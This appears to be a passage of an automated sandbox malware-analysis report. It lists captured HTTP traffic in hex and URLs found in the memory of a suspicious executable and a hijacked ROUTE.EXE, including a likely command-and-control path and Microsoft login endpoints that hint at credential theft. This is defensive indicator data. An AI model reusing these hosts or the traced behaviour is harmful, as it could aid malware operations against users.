40 cf f8 e5 a2 17 87 a8 d8 c9 1b 49 58 b3 99 5c e8 24 dd 19 eb c7 1f 44 b8 69 d6 42 b8 3e e3 41 34 ea d4 0e ba 26 29 4d da bd e5 6e 83 b7 c8 1c 41 ba 17 3d 64 32 e6 d0 48 8a 48 c5 91 9c 0a ad 45 b6 a7 30 d8 b0 57 4d 47 c5 85 75 2b c3 90 37 e6 40 5f 21 59 07 96 73 0e 13 a3 eb a9 9d 18 0d 9a 8f c5 e7 8f 15 2a ce eb 86 66 2c 74 40 5c 0e c0 a3 87 99 a7 20 21 c3 00 88 18 78 b3 6a aa 8c 31 65 c8 5b db 12 03 08 09 02 ba 49 23 12 d4 47 ea 01 5f 58 0d b0 2f 47 80 7e 97 5b cc 53 18 9d 76 9b bc 00 3f 47 90 29 70 cc 07 24 4b 3e 32 2a d2 75 a9 d6 a6 02 08 d5 03 9f e0 04 7d 0b 9f d8 98 fe 22 22 17 ee 1c 61 21 ac ca 4b 70 14 3c 18 43 ef 06 2f e2 c4 08 97 df 21 ef b0 fd 00 80 e5 7e d8 4b ce c5 5c ac 0d 4f ba 1f 2d 1a 6d 22 d3 e8 ee 97 59 e3 49 78 cd 32 b6 1a 05 e1 79 18 c6 bb a9 b7 6d 6a ee 7c 44 43 3b 3f d9 99 4f 26 9a 79 e1 e0 e2 8d b5 b2 57 d6 da 5e 5b 1b 6b 63 28 8d f0 b1 65 86 0f b5 22 41 83 da c3 e8 3d 9a 11 b3 2c 67 8e 21 6b c2 6b fd 73 f4 34 65 52 5f 49 f6 42 5d 46 bf 95 db eb 9f ee b7 7a 91 bb b9 d1 b1 40 d8 cc b1 0a 8e c5 ca e2 bf ba 52 97 c1 70 e8 74 5d ef 54 0a 6f 99 c0 3f aa d5 f4 c4 a4 e7 f0 08 7d 3a 0e f7 a8 c8 85 ed b7 21 8b e2 b0 46 d1 7f 1e c9 9e 2c 64 19 51 0a 85 c7 ff 3b 6a ba 47 41 2e 56 f9 be 11 8e 2f 38 ce b2 64 81 91 d0 db b7 58 62 e3 74 46 19 ff c8 b2 51 c5 01 e0 f9 12 e3 1c 8d 2a 4f fa a4 77 49 23 36 ca 91 7a ba fa db 39 8e 47 39 03 9f bb e3 f3 7d 3e 5b 2d d7 cb ed 66 cb 17 ab 4f a9 43 22 02 29 1b f0 0e ec 60 24 30 62 57 69 f6 20 ab d3 e1 34 e1 60 74 4d 4e 65 1f 90 e8 b3 51 11 53 d3 67 1e c2 6f e7 1f 8b 53 11 87 a5 1e 89 da a4 72 46 d9 4a 6a fc 0f 2c 99 34 f9 a9 94 1a 9d 80 96 d4 6e c9 64 35 63 75 d2 99 a1 03 22 36 97 e7 48 d4 10 27 1e a8 03 ec 34 41 83 78 b0 07 1d d1 36 5d 30 36 90 e1 54 ba e3 d5 2e 1d aa d1 69 34 fa d7 20 78 4e 26 dd 2d 6e d0 31 57 79 1c 39 62 ae 2c bf 02 19 9e d6 9e 41 79 4a 1e d0 00 c6 f1 58 5b e6 c3 e8 a5 c2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecontent-type: text/htmllast-modified: Wed, 18 Jan 2023 19:41:46 GMTetag: "999-63c84b7a-3d7f793868cb3f69;;;"accept-ranges: bytescontent-length: 2457date: Fri, 14 Feb 2025 11:24:20 GMTserver: LiteSpeedplatform: hostingerpanel: hpanelData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 75 73 22 20 70 72 65 66 69 78 3d 22 63 6f 6e 74 65 6e 74 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 72 73 73 2f 31 2e 30 2f 6d 6f 64 75 6c 65 73 2f 63 6f 6e 74 65 6e 74 2f 20 64 63 3a 20 68 74 74 70 3a 2f 2f 70 75 72 6c 2e 6f 72 67 2f 64 63 2f 74 65 72 6d 73 2f 20 66 6f 61 66 3a 20 68 74 74 70 3a 2f 2f 78 6d 6c 6e 73 2e 63 6f 6d 2f 66 6f 61 66 2f 30 2e 31 2f 20 6f 67 3a 20 68 74 74 70 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 20 72 64 66 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 30 31 2f 72 64 66 2d 73 63 68 65 6d 61 23 20 73 69 6f 63 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 6e 73 23 20 73 69 6f 63 74 3a 20 68 74 74 70 3a 2f 2f 72 64 66 73 2e 6f 72 67 2f 73 69 6f 63 2f 74 79 70 65 73 23 20 73 6b 6f 73 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 34 2f 30 32 2f 73 6b 6f 73 2f 63 6f 72 65 23 20 78 73 64 3a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 23 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 20 20 20 20 20 20 20 20 5b 6e 67 5c 3a 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 64 61 74 61 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 5b 78 2d 6e 67 2d 63 6c 6f 61 6b 5d 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 78 2d 6e 67 2d 63 6c 6f 61 6b 2c 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 68 69 64 65 3a 6e 6f 74 28 2e 6e 67 2d 68 69 64 65 2d 61 6e 69 6d 61 74 65 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 6e 67 5c 3a 66 6f 72 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 69 6d 61 74 65 2d 73 68 69 6d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 6e 67 2d 61 6e 63 68 6f 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:25:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jeanandolive.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=l4FaKyP3tSYdQOZ8ZwobTRLNHz_XvfqKHpY1rjuAW.0-1739532313-1.0.1.1-l5R.8wVP.nk3h2hqc8USF7Z_nzhx.2EFLCI68w4jt8Sr_.pj_38znVYkRLvSJdPLQdYdaoyFU_xxuvooBlXnuw; path=/; expires=Fri, 14-Feb-25 11:55:13 GMT; domain=.www.jeanandolive.net; HttpOnlySet-Cookie: _cfuvid=0wP6HrR.i7vkNKhGqTHA3992X5mVB8_iZ38uhq0sHQk-1739532313094-0.0.1.1-604800000; path=/; domain=.www.jeanandolive.net; HttpOnlyServer: cloudflareCF-RAY: 911cb23bdecb8cdd-EWRContent-Encoding: gzipData Raw: 32 36 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 72 e0 67 4d c4 fd 87 5a 4e 8c bb 29 a1 d0 78 f2 01 aa db bb 96 e5 08 5f dc de 6e 58 bb f6 ca da be 09 10 28 92 d0 e0 25 00 6c b2 87 6e ff f6 8b ac 2a bc 0b 0f 92 dd 1a 6f c4 aa 35 24 51 c8 ca cc ca cc ca 7a 67 7d fb 9b 7f fe c3 77 7f fa f1 8f df a3 5d 16 f8 0f ef be 85 2f e4 db e1 f6 7e 42 42 fc e7 1f 26 90 46 6c f7 e1 dd b7 01 c9 6c e4 ec ec 24 25 d9 fd e4 cf 7f fa 17 bc 98 e4 c9 a1 1d 90 fb c9 93 47 0e 71 94 64 13 e4 44 61 46 c2 ec 7e 72 f0 dc 6c 77 ef 92 27 cf 21 98 3e 48 c8 0b bd cc b3 7d 9c 3a b6 4f ee 55 40 e2 7b e1 27 94 10 ff 7e 12 27 d1 c6 f3 c9 04 ed 12 b2 b9 9f ec b2 2c b6 ee ee b6 41 bc 95 a3 64 7b 77 dc 84 77 6a 33 8b 17 6e d7 b6 f3 a9 91 e7 67 62 87 76 e8 46 be f7 44 e4 90 64 77 c7 c0 4f 62 47 8e 77 f1 e4 e1 5d 95 f1 9b 24 5a 47 59 7a 53 b0 Data Ascii: 268d}kFrgMZN)x_nX(%ln*o5$Qzg}w]/~BB&Fll$%GqdDaF~rlw'!>H}:OU@{'~',Ad{wwj3ngbvFDdwObGw]$ZGYzS
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:25:15 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jeanandolive.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressCF-Cache-Status: DYNAMICSet-Cookie: __cf_bm=1d3rumnOBJGq.tZZ4a7Q5kWT81_aQTLrfDwBk13jpjc-1739532315-1.0.1.1-3crdAS3vA1fnLnLxAPhaaaLM0OVJYScZ50f8xHVZoLstK8U1IzWJf0qAao19.l5GGvuwNTTsSlyI2AQZ0JawpQ; path=/; expires=Fri, 14-Feb-25 11:55:15 GMT; domain=.www.jeanandolive.net; HttpOnlySet-Cookie: _cfuvid=H1zrz9hc8CMWb932lTMjYWTUFIuDzEYidUKDZH7lvc0-1739532315642-0.0.1.1-604800000; path=/; domain=.www.jeanandolive.net; HttpOnlyServer: cloudflareCF-RAY: 911cb24bccdb8cd4-EWRContent-Encoding: gzipData Raw: 32 66 38 0d 0a 1f 8b 08 00 00 00 00 00 00 03 84 54 51 6f db 36 10 7e 8e 81 fd 07 f6 f6 e0 0d 93 c4 64 eb 80 41 b3 bc 14 5b f6 30 0c 4b 30 27 1b 8a 20 33 68 e9 2c 5d 4b 91 2c 79 b2 ec a6 fe ef 03 25 a7 f3 6a 14 79 22 f8 f1 bb ef 8e 1f 79 37 7b f1 cb f5 cf b7 af 6f ae 44 c3 ad 9e 4f 66 71 11 5a 99 ba 00 34 e9 dd 02 22 86 aa 9a 4f 66 2d b2 12 65 a3 7c 40 2e e0 ee f6 d7 f4 07 78 82 8d 6a b1 80 0d 61 ef ac 67 10 a5 35 8c 86 0b e8 a9 e2 a6 a8 70 43 25 a6 c3 26 11 64 88 49 e9 34 94 4a 63 71 11 45 34 99 b7 c2 a3 2e c0 79 bb 26 8d 20 1a 8f eb 02 1a 66 97 4b 59 b7 ae ce ac af e5 76 6d e4 c5 a7 21 64 ea 95 2a df 7e 12 f3 06 95 51 a6 b2 9a 36 98 19 64 b9 6d b5 77 65 e6 1a 07 f3 c9 71 e1 53 6f 57 96 c3 f4 63 d9 53 63 c9 54 b8 4d c4 da 6a 6d fb a9 90 f3 c9 d9 2c f0 4e e3 9c da 3a a7 f0 d5 7d a0 f7 18 0a 50 1d 5b 10 f4 90 88 11 f9 67 Data Ascii: 2f8TQo6~dA[0K0' 3h,]K,y%jy"y7{oDOfqZ4"Of-e\|@.xjag5pC%&dI4JcqE4.y& fKYvm!d*~Q6dmweqSoWcScTMjm,N:}P[g
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:25:18 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://jeanandolive.net/wp-json/>; rel="https://api.w.org/"Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPresscf-cache-status: DYNAMICSet-Cookie: __cf_bm=I.yuaszYFs_vM8Zw3M1e9UhYuhMQ0Xm8_pLDn4G5sCI-1739532318-1.0.1.1-76uGCV3O506ArKEe4FOLWPjaJkaW4iHV1zXXQJDHs5VufwAmirOkdYNWYGxFSYsjM.Rai.9tYdcBSEM9lRZHgw; path=/; expires=Fri, 14-Feb-25 11:55:18 GMT; domain=.www.jeanandolive.net; HttpOnlySet-Cookie: _cfuvid=zgwE_Ck5DE0bpWHVxrkAkcScI_0HAbkbPoJKjHwJmj4-1739532318258-0.0.1.1-604800000; path=/; domain=.www.jeanandolive.net; HttpOnlyServer: cloudflareCF-RAY: 911cb25c2fb00f4d-EWRContent-Encoding: gzipData Raw: 32 36 38 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 72 e0 67 4d c4 fd 87 5a 4e 8c bb 29 a1 d0 78 f2 01 aa db bb 96 e5 08 5f dc de 6e 58 bb f6 ca da be 09 10 28 92 d0 e0 25 00 6c b2 87 6e ff f6 8b ac 2a bc 0b 0f 92 dd 1a 6f c4 aa 35 24 51 c8 ca cc ca cc ca 7a 67 7d fb 9b 7f fe c3 77 7f fa f1 8f df a3 5d 16 f8 0f ef be 85 2f e4 db e1 f6 7e 42 42 fc e7 1f 26 90 46 6c f7 e1 dd b7 01 c9 6c e4 ec ec 24 25 d9 fd e4 cf 7f fa 17 bc 98 e4 c9 a1 1d 90 fb c9 93 47 0e 71 94 64 13 e4 44 61 46 c2 ec 7e 72 f0 dc 6c 77 ef 92 27 cf 21 98 3e 48 c8 0b bd cc b3 7d 9c 3a b6 4f ee 55 40 e2 7b e1 27 94 10 ff 7e 12 27 d1 c6 f3 c9 04 ed 12 b2 b9 9f ec b2 2c b6 ee ee b6 41 bc 95 a3 64 7b 77 dc 84 77 6a 33 8b 17 6e d7 b6 f3 a9 91 e7 67 62 87 76 e8 46 be f7 44 e4 90 64 77 c7 c0 4f 62 47 8e 77 f1 e4 e1 5d 95 f1 9b 24 5a 47 59 7a 53 b0 Data Ascii: 268d}kFrgMZN)x_nX(%ln*o5$Qzg}w]/~BB&Fll$%GqdDaF~rlw'!>H}:OU@{'~',Ad{wwj3ngbvFDdwObGw]$ZGYzS
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:25:49 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 14 Feb 2025 11:25:52 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Source: powershell.exe, 00000000.00000002.1843449682.00000000077AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.1833266097.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.1833266097.0000000004F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.1833266097.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4266897553.000000000577A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jeanandolive.net
Source: SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4266897553.000000000577A000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.jeanandolive.net/lqwe/
Source: powershell.exe, 00000000.00000002.1843103236.000000000774F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000000.00000002.1833266097.0000000004F21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.1837508516.0000000005F8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ROUTE.EXE, 0000000A.00000002.4267934782.00000000077DE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ROUTE.EXE, 0000000A.00000002.4265729687.00000000047F8000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004688000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: powershell.exe, 00000000.00000002.1833266097.0000000005076000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: ROUTE.EXE, 0000000A.00000002.4263831483.000000000286A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: ROUTE.EXE, 0000000A.00000002.4263831483.000000000286A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: ROUTE.EXE, 0000000A.00000002.4263831483.000000000286A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: ROUTE.EXE, 0000000A.00000002.4263831483.000000000286A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: ROUTE.EXE, 0000000A.00000002.4263831483.000000000286A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: ROUTE.EXE, 0000000A.00000003.2273033271.00000000077B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/amazeui.css
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/app.css
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/normalize.css
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/email.png
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/home.png
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/menu.png
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/search.png
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/service.png
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/icon/top.png
Source: ROUTE.EXE, 0000000A.00000002.4267793519.0000000005D10000.00000004.00000800.00020000.00000000.sdmp, ROUTE.EXE, 0000000A.00000002.4265729687.00000000041B0000.00000004.10000000.00040000.00000000.sdmp, SrZjbK9j4QXGHBZ.exe, 0000000B.00000002.4265161608.0000000004040000.00000004.00000001.00040000.00000000.sdmp	String found in binary or memory: https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png
